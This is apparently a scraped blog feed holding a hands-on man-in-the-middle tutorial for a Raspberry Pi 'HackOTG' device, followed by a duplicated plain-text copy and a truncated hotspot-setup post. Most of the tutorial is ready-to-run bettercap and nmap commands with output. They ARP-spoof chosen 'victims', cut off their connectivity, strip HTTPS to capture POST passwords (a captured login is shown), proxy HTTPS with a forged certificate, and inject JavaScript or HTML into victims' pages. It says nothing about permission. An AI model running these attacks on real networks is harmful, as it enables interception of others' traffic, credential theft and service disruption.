<p>Monitor mode is not very commonly supported because the main public does not use it. <em>Promiscuous mode</em> is more commonly available.</p>
<p>Without installing extra modules or changing drivers in our Raspberry Pi zero, we can only do <em>p</em>, which is fine for what we want to do. To test out which modes are supported you can do the following:</p>
<pre>iw list</pre>
<p>Now in the output you will find a list of supported modes. You must know the physical-id (Phy#) of your device (not needed if you have only one).</p>
<pre class="output">[...]
Supported interface modes:
* IBSS
* managed
* AP
* AP/VLAN
* monitor
* P2P-client
* P2P-GO
* P2P-device
[...]</pre>
<h2>Watch your own traffic</h2>
<p>First, connect to a WiFi-hotspot with your HackOTG with the 2 scripts (connect_wifi_***.sh and route_wlan0.sh) we made in <a href="https://larsveelaert.github.io/2017/10/11/hackotg-v1-2-basic-connectivity-to-internet/">this article</a>.</p>
<p>Now if we check the status of our network-cards with the following command, we can see the FLAGS at the end. The “P”-flag means promiscuous. As you can see, there’s none, because our device is not in the <em>Promiscuous mode</em>.</p>
<pre>netstat -i</pre>
<pre class="output">Kernel Interface table
Iface MTU RX-OK RX-ERR RX-DRP RX-OVR TX-OK TX-ERR TX-DRP TX-OVR Flg
lo 65536 55 0 0 0 55 0 0 0 LRU
usb0 1500 2039 0 0 0 502 0 0 0 BMRU
wlan0 1500 2482 0 1 0 147 0 0 0 BMRU</pre>
<p>Let’s check what we can see going through our card right now by installing a tool called “tshark”, the terminal-equivalent of wireshark (a quite famous program).</p>
<pre>sudo apt-get install tshark</pre>
<p>Just press “no” () if you get asked about the dumpcat program and about running the tshark program as a non-superuser. To use tshark on your wireless interface, use the following command:</p>
<pre>sudo tshark -i wlan0</pre>
<p>Now to generate some traffic run, log in to your HackOTG with another session and run “sudo apt-get update”. You can now see the traffic generated by the HackOTG.</p>
<pre class="output">[...]
21 45.328684570 192.168.1.51 → 192.168.1.1 DNS 87 Standard query 0xeac0 A mirrordirector.raspbian.org
22 45.331851556 192.168.1.51 → 192.168.1.1 DNS 83 Standard query 0xa5b2 A archive.raspberrypi.org
23 45.332182555 192.168.1.51 → 192.168.1.1 DNS 87 Standard query 0x9b47 AAAA mirrordirector.raspbian.org
24 45.332410554 192.168.1.51 → 192.168.1.1 DNS 83 Standard query 0xb93d AAAA archive.raspberrypi.org
[...]</pre>
<p>Now do the same, but first put the card in <em>promiscuous mode</em> before running the <em>tshark-command</em>. To put your card in <em>promiscuous mode</em>, do the following:</p>
<pre>sudo ifconfig wlan0 promisc</pre>
<p>To check if it worked, see the extra “P” flag at the end:</p>
<pre>netstat -i</pre>
<pre class="output">Kernel Interface table
Iface MTU RX-OK RX-ERR RX-DRP RX-OVR TX-OK TX-ERR TX-DRP TX-OVR Flg
lo 65536 55 0 0 0 55 0 0 0 LRU
usb0 1500 2039 0 0 0 502 0 0 0 BMRU
wlan0 1500 2482 0 1 0 147 0 0 0 BMRPU</pre>
<p>Now if we run our <em>tshark-command</em> again:</p>
<pre>sudo tshark -i wlan0</pre>
<p>And after generating some traffic… You won’t see any more than before. This is because you are probably on an encrypted WiFi-access point and you’ll only be able to decrypt the traffic meant for you. So the only question that rests is “How can we make the others on the network send their traffic through us”? Read on…</p>
<p>You can disable <em>promiscuous mode</em> with this command:</p>
<pre>sudo ifconfig wlan0 -promisc</pre>
<h2>See and interfere with others’ traffic (MitM)</h2>
<p>So to get all the traffic of the network (or form a specific set of hosts) through our system, we can use a lot of different techniques. Apart from physicly being the gateway or inline with the host we have multiple techniques to reroute traffic if we are a normal client to the network. Being in the position where all the traffic flows through is called <a href="https://en.wikipedia.org/wiki/Man-in-the-middle_attack">Man in the Middle</a>. From there you’ll be able to influence the traffic.</p>
<p>One of the ways to redirect the traffic is by abusing the <a href="https://nl.wikipedia.org/wiki/Address_Resolution_Protocol">ARP-protocol</a>. Which will tell everybody on the network that they are the gateway (basicly). There is a tool available for doing this <em>arpspoof.</em> But you’ll still have to search the IP’s of the real gateway and of all victims.</p>
<p>Many of the tools to redirect, change, filter and monitor traffic in a network are bundled in one called <a href="https://www.bettercap.org/">bettercap</a>. It is the next iteration of <em>ettercap</em>, also a very famous tool. Remember that bettercap is a great tool but stands on the shoulders of gaints by using other tools and techniques to interfere with traffic.</p>
<p>The rest of this article will go over the installation and basic usage of the tool and how to use it on your HackOTG. In general, these tools always need some dependecies and total control over the interface, so using HackOTG is perfect for this purpose.</p>
<h3>1. Installation</h3>
<p>There are a couple ways to install <em>Bettercap</em>, the most stable way and universal across all linux disto’s is to install <em>Bettercap</em> with the gem package manager of the _ruby-_package. First make sure you have these dependencies:</p>
<pre><span class="n">sudo apt-get install build</span><span class="o">-</span><span class="n">essential</span> <span class="n">ruby</span><span class="o">-</span><span class="n">dev</span> <span class="n">libpcap</span><span class="o">-</span><span class="n">dev</span></pre>
<p>After retrieving the dependencies, install bettercap from the gem repository:</p>
<pre><span class="n">sudo gem</span> <span class="n">install</span> <span class="n">bettercap</span></pre>
<h3>2. Usage</h3>
<p>Bettercap has a lot of options, so I will try to go through a couple scenarios, make sure you also take a look at <a href="https://www.bettercap.org/index.html#options">their documentation</a> to see the full range of capabilities.</p>
<p><em><strong>Don’t run the following commands without reading what they do, if people are on your network, they will be affected. Nobody wants to hear people yelling when Netflix keeps dropping out or the printer doesn’t work anymore. Better safe then sorry.</strong></em></p>
<p>So if you run Bettercap as:</p>
<pre>sudo bettercap -I wlan0</pre>
<p>Bettercap willl, by default, redirect traffic through our interface for all the hosts connected to that network. This is not a silent command, meaning if somebody was scanning the network for nefarious actions, they will spot you! But read on the learn about obfisquation of your traffic by changing your MAC adress (Think of it like a fingerprint), which will make the make and model of your device impossible to trace. Your IP will still be the same, that is something you can’t change.</p>
<p>To attack only specific hosts we will need to know an IP or a MAC. This is were somebody who can copy commands, becomes a hacker. There are many tools available to “scan” a network, but the famous <em><a href="https://nmap.org/">nmap</a></em>-tool is a very good one. It is far to complex to explain all it’s features in this article, but check out the <a href="https://nmap.org/">documentation</a> if you want to know more. You can install it with <em>sudo</em> <em>apt-get install nmap</em> and then <strong>run the following command:</strong></p>
<pre>sudo nmap -sn 192.168.1.*</pre>
<p>This tool will go over all the addresses specified and give you back some info:</p>
<pre class="output">[...]
MAC Address: B8:27:EB:4E:0C:42 (Raspberry Pi Foundation)
Nmap scan report for 192.168.1.14
Host is up (-0.13s latency).
MAC Address: 10:02:B5:D6:08:8A (Intel Corporate)
Nmap scan report for vanboven.lan (192.168.1.20)
Host is up (-0.19s latency).
[...]</pre>
<p>If you can’t determine the IP or MAC you have to check for certain traffic (later on in this article) to try to pinpoint a certain host. (attacking only a set of hosts is way more effective and puts less strain on the network and your system). You can always just walk over to a device an retrieve it’s IP if it’s just for demonstration purposes.</p>
<p>If you don’t know the addresses to scan, or if you want to automate the command, use this script <strong>scan_networks.sh</strong>:</p>
<pre class="output">for a in $(hostname -I)
do
if [ "${#a}" -lt 16 ]; then
sudo nmap -sn $(echo $a | grep -E '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | rev | cut -d . -f2- | rev).*
fi
done</pre>
<p>Simply run the following command to get all the hosts on the networks attached on all interfaces:</p>
<pre>sh scan_networks.sh</pre>
<p><strong>Now we can complete our</strong> <strong><em>bettercap</em></strong><strong>-command with a couple of victims to attack:</strong></p>
<pre>sudo bettercap -I wlan0 -T 192.168.1.14, 192.168.1.9</pre>
<p><strong>Another options is to specify a target by MAC address:</strong></p>
<pre>sudo bettercap -I wlan0 -T 01:23:45:67:89:10</pre>
<p><strong>Or to attack a range of IP addresses:</strong></p>
<pre>sudo bettercap -I wlan0 -T 192.168.1.1-30</pre>
<p><strong>You can also specify the addresses to ignore (but attack all others:</strong></p>
<pre>sudo bettercap -I wlan0 --ignore 192.168.1.14, 192.168.1.9</pre>
<h3>3. Example attacks</h3>
<p>What you created above, will be your basic command, which will redirect all trafic, but will do nothing with it. Not even look at it. <strong>If you want to see of the traffic that is going trough, add -X (sniffer) to the command.</strong></p>
<pre>sudo bettercap -I wlan0 -T 192.168.1.14, 192.168.1.9 -X</pre>
<pre class="output">[I] Starting [ spoofing:✔ discovery:✘ sniffer:✔ tcp-proxy:✘ udp-proxy:✘ http-proxy:✘ https-proxy:✘ sslstrip:✘ http-server:✘ dns-server:✘ ] ...
[I] [wlan0] 192.168.1.17 : B8:27:EB:D8:B4:4A / wlan0 ( Raspberry Pi Foundation )
[I] Found hostname dsldevice for address 192.168.1.1
[I] [GATEWAY] 192.168.1.1 : 30:91:8F:9F:71:3C / dsldevice ( Technicolor )
[I] [TARGET] 192.168.1.14 : 10:02:B5:D6:08:8A ( Intel Corporate )
[192.168.1.14 > 52.85.61.198:https] [HTTPS] https://api-v2.soundcloud.com/
[192.168.1.14 > 52.85.61.198:https] [HTTPS] https://l9bjkkhaycw6f8f4.soundcloud.com/
[192.168.1.14 > 52.85.62.252:https] [HTTPS] https://cf-hls-media.sndcdn.com/
[192.168.1.14 > 52.85.61.198:https] [HTTPS] https://l9bjkkhaycw6f8f4.soundcloud.com/
[192.168.1.14 > 52.85.62.252:https] [HTTPS] https://cf-hls-media.sndcdn.com/
[192.168.1.14 > 52.85.61.184:https] [HTTPS] https://api.soundcloud.com/
[192.168.1.14 > 52.85.62.252:https] [HTTPS] https://cf-hls-media.sndcdn.com/</pre>
<p>As you can see, I was listening to music of the _soundcloud-_website on that device. We can also see the protocol used etc. Now from here we can enable options to inject, alter, kill or redirect traffic. Another powerful and easy attack to show is to <strong>kill the traffic, which will make the device unable to connect to the internet or any other network-resource:</strong></p>
<pre><span class="pre">sudo bettercap -T</span> <span class="pre">192.168.1.14</span> <span class="pre">--kill </span></pre>
<p>You can also strip encryption (HTTPS, HSTS) till a certain extend by using other built-in techniques like <em>ssl-strip</em>: (the <em>-P POST</em> is to filter on the protocol POST, where passwords will reside if found)</p>
<pre>sudo bettercap -T 192.168.1.14 --proxy -P POST</pre>
<p><img src="/assets/bettercap_capture.png" alt="Bettercap capture" /></p>
<p>As you can see (above) a password was captured:</p>
<pre class="output">[REQUEST BODY]
RedirectUrl : http://www.standaard.be/
EmailOrUsername : username
Password : hellooooo</pre>
<p>If you can’t strip the encryption (better safety), you can replace it with your own encryption layer. This will give a popup or alert on most modern browsers, but often victims will still go through, giving you a peek in that connection. Here is the command:</p>
<pre>sudo bettercap -T 192.168.1.14 --proxy --proxy-https -P POST</pre>
<p><img src="/assets/connection_private.png" alt="Connection private" /></p>
<p>Now if we have control over the unencrypted data, we can change it in any way we want. Some easy examples for injection attacks are the following, you can still add the force https option to these:</p>
<p><strong>Make all pages pink:</strong></p>
<pre>sudo bettercap -I wlan0 -T 192.168.1.14 --proxy-module injectcss --css-data '*{background-color:#fd3078!important; color:white!important}'</pre>
<p><strong>Give a popup “HACKED”:</strong></p>
<pre>sudo bettercap -I wlan0 -T 192.168.1.14 --proxy-module injectjs --js-data 'alert("hacked");'</pre>
<p><strong>Play youtube-video fullscreen on all visited pages:</strong></p>
<pre>sudo bettercap -I wlan0 -T 192.168.1.14 --proxy-module injecthtml --html-file baby.html
#baby.html
<iframe style="position:absolute; z-index:10000" width="100%" height="100%"
src="https://www.youtube.com/embed/kffacxfA7G4?autoplay=1" frameborder="0" allowfullscreen></iframe>
<div style="position:absolute;width:100%;height:100%;z-index:10001;"></div>'</pre>
<p>To give some easy demo’s, I made a script that contains these commands and a bit more. If you take a look at <a href="https://github.com/larsveelaert/HackOTG">this github-repo</a>, you can find all the files we use for the HackOTG, and the file <a href="https://github.com/larsveelaert/HackOTG/blob/master/mitm.sh">mitm.sh</a>, which is a general <em>bettercap-_script to use on any device. Just run it with _sh</em> and answer the questions to automate the commands shown above.</p>
<p>So here we can end our attack on networks we already know the password to. Next we will dive into other ways to get control over a victims traffic.</p>Lars VeelaertThis article is part of a series: you can find the first article here. If you missed the previous one, it is here. First, the basics Your network card (WiFi or ethernet) is your gateway to your network and the rest of the internet. The most common way to use it is to connect to an existing network, get an IP and done! But a network card can do many other things. A good example is that WiFi cards can set up a WiFi-hotspot themselves (mobile phone tethering). We did this to the card of our HackOTG in one of the previous articles. In the normal ‘client’ mode, which is just being connected to an existing network our network-card will only process packets that are directly meant for us to use or send through. We can change this behavior in 2 ways. You can go into Monitor mode, which means you can now see the packets in the air without connecting (associating) with any Wifi access point. Think of it like listening to people’s conversations while you walk down the street. There is also Promiscuous mode, which is processing all packets touching the network-card. In a wireless system, you will have to be in proximity of the transmitting device, in a wired ethernet-network the packets must go through cable in which you are connected. In a normal switch setup, a packet will not be forwarded by the router, because it knows which devices are connected on which line. Monitor mode is not very commonly supported because the main public does not use it. Promiscuous mode is more commonly available. Without installing extra modules or changing drivers in our Raspberry Pi zero, we can only do p, which is fine for what we want to do. To test out which modes are supported you can do the following: iw list Now in the output you will find a list of supported modes. You must know the physical-id (Phy#) of your device (not needed if you have only one). [...] Supported interface modes: * IBSS * managed * AP * AP/VLAN * monitor * P2P-client * P2P-GO * P2P-device [...] Watch your own traffic First, connect to a WiFi-hotspot with your HackOTG with the 2 scripts (connect_wifi_***.sh and route_wlan0.sh) we made in this article. Now if we check the status of our network-cards with the following command, we can see the FLAGS at the end. The “P”-flag means promiscuous. As you can see, there’s none, because our device is not in the Promiscuous mode. netstat -i Kernel Interface table Iface MTU RX-OK RX-ERR RX-DRP RX-OVR TX-OK TX-ERR TX-DRP TX-OVR Flg lo 65536 55 0 0 0 55 0 0 0 LRU usb0 1500 2039 0 0 0 502 0 0 0 BMRU wlan0 1500 2482 0 1 0 147 0 0 0 BMRU Let’s check what we can see going through our card right now by installing a tool called “tshark”, the terminal-equivalent of wireshark (a quite famous program). sudo apt-get install tshark Just press “no” () if you get asked about the dumpcat program and about running the tshark program as a non-superuser. To use tshark on your wireless interface, use the following command: sudo tshark -i wlan0 Now to generate some traffic run, log in to your HackOTG with another session and run “sudo apt-get update”. You can now see the traffic generated by the HackOTG. [...] 21 45.328684570 192.168.1.51 → 192.168.1.1 DNS 87 Standard query 0xeac0 A mirrordirector.raspbian.org 22 45.331851556 192.168.1.51 → 192.168.1.1 DNS 83 Standard query 0xa5b2 A archive.raspberrypi.org 23 45.332182555 192.168.1.51 → 192.168.1.1 DNS 87 Standard query 0x9b47 AAAA mirrordirector.raspbian.org 24 45.332410554 192.168.1.51 → 192.168.1.1 DNS 83 Standard query 0xb93d AAAA archive.raspberrypi.org [...] Now do the same, but first put the card in promiscuous mode before running the tshark-command. To put your card in promiscuous mode, do the following: sudo ifconfig wlan0 promisc To check if it worked, see the extra “P” flag at the end: netstat -i Kernel Interface table Iface MTU RX-OK RX-ERR RX-DRP RX-OVR TX-OK TX-ERR TX-DRP TX-OVR Flg lo 65536 55 0 0 0 55 0 0 0 LRU usb0 1500 2039 0 0 0 502 0 0 0 BMRU wlan0 1500 2482 0 1 0 147 0 0 0 BMRPU Now if we run our tshark-command again: sudo tshark -i wlan0 And after generating some traffic… You won’t see any more than before. This is because you are probably on an encrypted WiFi-access point and you’ll only be able to decrypt the traffic meant for you. So the only question that rests is “How can we make the others on the network send their traffic through us”? Read on… You can disable promiscuous mode with this command: sudo ifconfig wlan0 -promisc See and interfere with others’ traffic (MitM) So to get all the traffic of the network (or form a specific set of hosts) through our system, we can use a lot of different techniques. Apart from physicly being the gateway or inline with the host we have multiple techniques to reroute traffic if we are a normal client to the network. Being in the position where all the traffic flows through is called Man in the Middle. From there you’ll be able to influence the traffic. One of the ways to redirect the traffic is by abusing the ARP-protocol. Which will tell everybody on the network that they are the gateway (basicly). There is a tool available for doing this arpspoof. But you’ll still have to search the IP’s of the real gateway and of all victims. Many of the tools to redirect, change, filter and monitor traffic in a network are bundled in one called bettercap. It is the next iteration of ettercap, also a very famous tool. Remember that bettercap is a great tool but stands on the shoulders of gaints by using other tools and techniques to interfere with traffic. The rest of this article will go over the installation and basic usage of the tool and how to use it on your HackOTG. In general, these tools always need some dependecies and total control over the interface, so using HackOTG is perfect for this purpose. 1. Installation There are a couple ways to install Bettercap, the most stable way and universal across all linux disto’s is to install Bettercap with the gem package manager of the _ruby-_package. First make sure you have these dependencies: sudo apt-get install build-essential ruby-dev libpcap-dev After retrieving the dependencies, install bettercap from the gem repository: sudo gem install bettercap 2. Usage Bettercap has a lot of options, so I will try to go through a couple scenarios, make sure you also take a look at their documentation to see the full range of capabilities. Don’t run the following commands without reading what they do, if people are on your network, they will be affected. Nobody wants to hear people yelling when Netflix keeps dropping out or the printer doesn’t work anymore. Better safe then sorry. So if you run Bettercap as: sudo bettercap -I wlan0 Bettercap willl, by default, redirect traffic through our interface for all the hosts connected to that network. This is not a silent command, meaning if somebody was scanning the network for nefarious actions, they will spot you! But read on the learn about obfisquation of your traffic by changing your MAC adress (Think of it like a fingerprint), which will make the make and model of your device impossible to trace. Your IP will still be the same, that is something you can’t change. To attack only specific hosts we will need to know an IP or a MAC. This is were somebody who can copy commands, becomes a hacker. There are many tools available to “scan” a network, but the famous nmap-tool is a very good one. It is far to complex to explain all it’s features in this article, but check out the documentation if you want to know more. You can install it with sudo apt-get install nmap and then run the following command: sudo nmap -sn 192.168.1.* This tool will go over all the addresses specified and give you back some info: [...] MAC Address: B8:27:EB:4E:0C:42 (Raspberry Pi Foundation) Nmap scan report for 192.168.1.14 Host is up (-0.13s latency). MAC Address: 10:02:B5:D6:08:8A (Intel Corporate) Nmap scan report for vanboven.lan (192.168.1.20) Host is up (-0.19s latency). [...] If you can’t determine the IP or MAC you have to check for certain traffic (later on in this article) to try to pinpoint a certain host. (attacking only a set of hosts is way more effective and puts less strain on the network and your system). You can always just walk over to a device an retrieve it’s IP if it’s just for demonstration purposes. If you don’t know the addresses to scan, or if you want to automate the command, use this script scan_networks.sh: for a in $(hostname -I) do if [ "${#a}" -lt 16 ]; then sudo nmap -sn $(echo $a | grep -E '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | rev | cut -d . -f2- | rev).* fi done Simply run the following command to get all the hosts on the networks attached on all interfaces: sh scan_networks.sh Now we can complete our bettercap-command with a couple of victims to attack: sudo bettercap -I wlan0 -T 192.168.1.14, 192.168.1.9 Another options is to specify a target by MAC address: sudo bettercap -I wlan0 -T 01:23:45:67:89:10 Or to attack a range of IP addresses: sudo bettercap -I wlan0 -T 192.168.1.1-30 You can also specify the addresses to ignore (but attack all others: sudo bettercap -I wlan0 --ignore 192.168.1.14, 192.168.1.9 3. Example attacks What you created above, will be your basic command, which will redirect all trafic, but will do nothing with it. Not even look at it. If you want to see of the traffic that is going trough, add -X (sniffer) to the command. sudo bettercap -I wlan0 -T 192.168.1.14, 192.168.1.9 -X [I] Starting [ spoofing:✔ discovery:✘ sniffer:✔ tcp-proxy:✘ udp-proxy:✘ http-proxy:✘ https-proxy:✘ sslstrip:✘ http-server:✘ dns-server:✘ ] ... [I] [wlan0] 192.168.1.17 : B8:27:EB:D8:B4:4A / wlan0 ( Raspberry Pi Foundation ) [I] Found hostname dsldevice for address 192.168.1.1 [I] [GATEWAY] 192.168.1.1 : 30:91:8F:9F:71:3C / dsldevice ( Technicolor ) [I] [TARGET] 192.168.1.14 : 10:02:B5:D6:08:8A ( Intel Corporate ) [192.168.1.14 > 52.85.61.198:https] [HTTPS] https://api-v2.soundcloud.com/ [192.168.1.14 > 52.85.61.198:https] [HTTPS] https://l9bjkkhaycw6f8f4.soundcloud.com/ [192.168.1.14 > 52.85.62.252:https] [HTTPS] https://cf-hls-media.sndcdn.com/ [192.168.1.14 > 52.85.61.198:https] [HTTPS] https://l9bjkkhaycw6f8f4.soundcloud.com/ [192.168.1.14 > 52.85.62.252:https] [HTTPS] https://cf-hls-media.sndcdn.com/ [192.168.1.14 > 52.85.61.184:https] [HTTPS] https://api.soundcloud.com/ [192.168.1.14 > 52.85.62.252:https] [HTTPS] https://cf-hls-media.sndcdn.com/ As you can see, I was listening to music of the _soundcloud-_website on that device. We can also see the protocol used etc. Now from here we can enable options to inject, alter, kill or redirect traffic. Another powerful and easy attack to show is to kill the traffic, which will make the device unable to connect to the internet or any other network-resource: sudo bettercap -T 192.168.1.14 --kill You can also strip encryption (HTTPS, HSTS) till a certain extend by using other built-in techniques like ssl-strip: (the -P POST is to filter on the protocol POST, where passwords will reside if found) sudo bettercap -T 192.168.1.14 --proxy -P POST As you can see (above) a password was captured: [REQUEST BODY] RedirectUrl : http://www.standaard.be/ EmailOrUsername : username Password : hellooooo If you can’t strip the encryption (better safety), you can replace it with your own encryption layer. This will give a popup or alert on most modern browsers, but often victims will still go through, giving you a peek in that connection. Here is the command: sudo bettercap -T 192.168.1.14 --proxy --proxy-https -P POST Now if we have control over the unencrypted data, we can change it in any way we want. Some easy examples for injection attacks are the following, you can still add the force https option to these: Make all pages pink: sudo bettercap -I wlan0 -T 192.168.1.14 --proxy-module injectcss --css-data '*{background-color:#fd3078!important; color:white!important}' Give a popup “HACKED”: sudo bettercap -I wlan0 -T 192.168.1.14 --proxy-module injectjs --js-data 'alert("hacked");' Play youtube-video fullscreen on all visited pages: sudo bettercap -I wlan0 -T 192.168.1.14 --proxy-module injecthtml --html-file baby.html #baby.html <iframe style="position:absolute; z-index:10000" width="100%" height="100%" src="https://www.youtube.com/embed/kffacxfA7G4?autoplay=1" frameborder="0" allowfullscreen></iframe> <div style="position:absolute;width:100%;height:100%;z-index:10001;"></div>' To give some easy demo’s, I made a script that contains these commands and a bit more. If you take a look at this github-repo, you can find all the files we use for the HackOTG, and the file mitm.sh, which is a general bettercap-_script to use on any device. Just run it with _sh and answer the questions to automate the commands shown above. So here we can end our attack on networks we already know the password to. Next we will dive into other ways to get control over a victims traffic.HackOTG (v1.3): Creating our own hotspot on boot2017-10-11T00:00:00+00:002017-10-11T00:00:00+00:00https://lvlrt.github.io/2017/10/11/hackotg-v1-3-creating-our-own-hotspot-on-boot<p><img src="/assets/wifi_pi.png" alt="Header" /></p>
<p><em>This article is part of a series: <a href="/2017/10/07/hackotg-v1-0-universal-portable-security-platform/">you can find the first article here</a>. If you missed the previous one, <a href="/2017/10/11/hackotg-v1-2-basic-connectivity-to-internet/">it is here</a>.</em></p>
<h2>Checking the capabilities of our WiFi-interface</h2>
<p>On any system you can run the following command to get the capabilities of the wireless interfaces attached to that device:</p>
<pre>iw list</pre>
<p>In the output of our Pi Zero W, we can see that is supports an AP mode, which means we can make the HostOTG create a hotspot on boot for controlling the device from a distance or without making use of the Ethernet-to-USB interface that the HostOTG emulates.</p>
<p>In the same output you can also see that we can combine modes, but with a couple restrictions:</p>
<pre class="output">#{ managed } <= 1, #{ AP } <= 1, #{ P2P-client } <= 1, #{ P2P-device } <= 1,
total <= 4, #channels <= 1</pre>
<p>This means that we can set the interface in both AP and client mode. As a result you can have connectivity from an existing WiFi-hotspot and create also our own. Both hotspots must exist on the same channel, but that is no problem.</p>
<p>This is quite advanced but cool to keep in mind. In our case we want to set up an AP that starts on boot, so we can make our first connection. If you want to use both the AP and be a client to another, you’ll have to know and configure the environment before. This is not practical, so you’ll have to configure it over the emulated Ethernet-to-USB connection to make it work in every situation. You can find more on setting up combined modes <a href="https://wiki.archlinux.org/index.php/software_access_point">here</a>.</p>
<h2>Creating the hotspot</h2>
<p><strong>Install the necessairy packages:</strong></p>
<pre>sudo apt-get install hostapd dnsmasq</pre>
<p>Now we must create a configuration file containing all the settings of the hotspot. I like to keep all configurations files in the home directory, so they are easily changed, copied and reused. We will be combining a lot of the programs in different setups, so it’s easier if they are easy to find.</p>
<p><strong>Create the file <em>hostapd.conf</em>:</strong> (Change ssid and wpa_passphrase if you want to)</p>
<pre>ssid=HackOTG
wpa_passphrase=raspberry
interface=wlan0
driver=nl80211
hw_mode=g
channel=6
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP
rsn_pairwise=CCMP</pre>
<p><strong>Start the hotspot:</strong></p>
<pre>killall wpa_supplicant dhcpcd hostapd dnsmasq #kill all unnecessary processes
sudo mount --bind /dev/urandom /dev/random #BUGFIX, to ensure good security
sudo hostapd hostapd.conf</pre>
<h2>Run a DHCP-server on the hotspot-interface</h2>
<p>An easy and lightweight option of looking for a DHCP-server is “dnsmasq”. We already installed the package so we go on and create the config file.</p>
<p><strong>dnsmasq.conf:</strong></p>
<pre class="output"># disables dnsmasq reading any other files like /etc/resolv.conf for nameservers
no-resolv
# Interface to bind to
interface=wlan0
# Specify starting_range,end_range,lease_time
dhcp-range=10.0.0.3,10.0.0.20,12h
# dns addresses to send to the clients
server=8.8.8.8
server=8.8.4.4</pre>
<p><strong>Start the DHCP-server and configure the interface:</strong></p>
<pre>sudo dnsmasq -C dnsmaq.conf
sudo ifconfig wlan0 up 10.0.0.1 netmask 255.255.255.0</pre>
<h2>Putting it all together</h2>
<p>We can make scripts to start or stop the hotspot on-demand. Just create these scripts and run them to put the HackOTG in and out hotspot-mode.</p>
<p><strong>hotspot_start.sh:</strong></p>
<pre>if [ $( mount | grep urandom | wc -l ) -eq 0 ]; then
sudo mount --bind /dev/urandom /dev/random
fi
sh /home/pi/hotspot_stop.sh
sudo hostapd /home/pi/hostapd.conf&
sudo dnsmasq -C /home/pi/dnsmasq.conf&
sleep 2
sudo ifconfig wlan0 up 10.0.0.1 netmask 255.255.255.0</pre>
<p><strong>hotspot_stop.sh:</strong></p>
<pre>sudo killall dnsmasq hostapd dhcpcd wpa_supplicant
sudo ifconfig wlan0 0.0.0.0</pre>
<p><em>(optional) _You should add the hotspot_stop.sh script to the previous _connect_wifi_ssid.sh</em> script from <a href="https://larsveelaert.github.io/2017/10/11/hackotg-v1-2-basic-connectivity-to-internet/">this article</a>. Otherwise you will not be able to connect to the internet anymore because the AP will be occupying the AP, add the <em>hotspot_stop.sh</em> command to the script like this:</p>
<pre>sh /home/pi/hotspot_stop.sh
sudo wpa_supplicant -B -i wlan0 -D wext -c ssid.conf
sudo dhcpcd --nohook wpa_supplicant wlan0</pre>
<h2>Start the hotspot on boot</h2>
<p>For all Debian-based distro’s there is a file <em>/etc/rc.local</em> that runs all commands that are put in it when the device is fully booted. Simply add a line with the <em>hotspot_start.sh</em> command to it (don’t forget the & at the end to make it a background-process). The command should go before the line containing <em>“exit 0”</em>.</p>
<p><strong>/etc/rc.local:</strong></p>
<pre># By default this script does nothing.
# Print the IP address
_IP=$(hostname -I) || true
if [ "$_IP" ]; then
printf "My IP address is %s\n" "$_IP"
fi
# put your scripts to boot here
sh /home/pi/hotspot_start.sh&
exit 0</pre>
<p>Now you can restart the device and if everything is OK, it will create the WiFi-hotspot named <em>“HackOTG”</em> with the password <em>“raspberry”</em>. If you waited for a minute and you can’t pick up the signal, you can still log in to your device over the emulated Ethernet-to-USB device. Now you have 2 ways to connect to your HackOTG!.</p>
<p>In <a href="/2017/10/31/hackotg-v1-4-see-all-traffic-on-a-network/">the next article</a> we will further explore the possibilities to see and controll trafiic on a network.</p>
<blockquote class="wp-embedded-content" data-secret="UxtFeiWmpQ">
<p>
<a href="/2017/10/31/hackotg-v1-4-see-all-traffic-on-a-network/">HackOTG (v1.4): See all traffic on a network with Promiscuous mode and Bettercap</a>
</p>
</blockquote>Lars VeelaertThis article is part of a series: you can find the first article here. If you missed the previous one, it is here. Checking the capabilities of our WiFi-interface On any system you can run the following command to get the capabilities of the wireless interfaces attached to that device: iw list In the output of our Pi Zero W, we can see that is supports an AP mode, which means we can make the HostOTG create a hotspot on boot for controlling the device from a distance or without making use of the Ethernet-to-USB interface that the HostOTG emulates. In the same output you can also see that we can combine modes, but with a couple restrictions: #{ managed } <= 1, #{ AP } <= 1, #{ P2P-client } <= 1, #{ P2P-device } <= 1, total <= 4, #channels <= 1 This means that we can set the interface in both AP and client mode. As a result you can have connectivity from an existing WiFi-hotspot and create also our own. Both hotspots must exist on the same channel, but that is no problem. This is quite advanced but cool to keep in mind. In our case we want to set up an AP that starts on boot, so we can make our first connection. If you want to use both the AP and be a client to another, you’ll have to know and configure the environment before. This is not practical, so you’ll have to configure it over the emulated Ethernet-to-USB connection to make it work in every situation. You can find more on setting up combined modes here. Creating the hotspot Install the necessairy packages: sudo apt-get install hostapd dnsmasq Now we must create a configuration file containing all the settings of the hotspot. I like to keep all configurations files in the home directory, so they are easily changed, copied and reused. We will be combining a lot of the programs in different setups, so it’s easier if they are easy to find. Create the file hostapd.conf: (Change ssid and wpa_passphrase if you want to) ssid=HackOTG wpa_passphrase=raspberry interface=wlan0 driver=nl80211 hw_mode=g channel=6 macaddr_acl=0 auth_algs=1 ignore_broadcast_ssid=0 wpa=2 wpa_key_mgmt=WPA-PSK wpa_pairwise=TKIP rsn_pairwise=CCMP Start the hotspot: killall wpa_supplicant dhcpcd hostapd dnsmasq #kill all unnecessary processes sudo mount --bind /dev/urandom /dev/random #BUGFIX, to ensure good security sudo hostapd hostapd.conf Run a DHCP-server on the hotspot-interface An easy and lightweight option of looking for a DHCP-server is “dnsmasq”. We already installed the package so we go on and create the config file. dnsmasq.conf: # disables dnsmasq reading any other files like /etc/resolv.conf for nameservers no-resolv # Interface to bind to interface=wlan0 # Specify starting_range,end_range,lease_time dhcp-range=10.0.0.3,10.0.0.20,12h # dns addresses to send to the clients server=8.8.8.8 server=8.8.4.4 Start the DHCP-server and configure the interface: sudo dnsmasq -C dnsmaq.conf sudo ifconfig wlan0 up 10.0.0.1 netmask 255.255.255.0 Putting it all together We can make scripts to start or stop the hotspot on-demand. Just create these scripts and run them to put the HackOTG in and out hotspot-mode. hotspot_start.sh: if [ $( mount | grep urandom | wc -l ) -eq 0 ]; then sudo mount --bind /dev/urandom /dev/random fi sh /home/pi/hotspot_stop.sh sudo hostapd /home/pi/hostapd.conf& sudo dnsmasq -C /home/pi/dnsmasq.conf& sleep 2 sudo ifconfig wlan0 up 10.0.0.1 netmask 255.255.255.0 hotspot_stop.sh: sudo killall dnsmasq hostapd 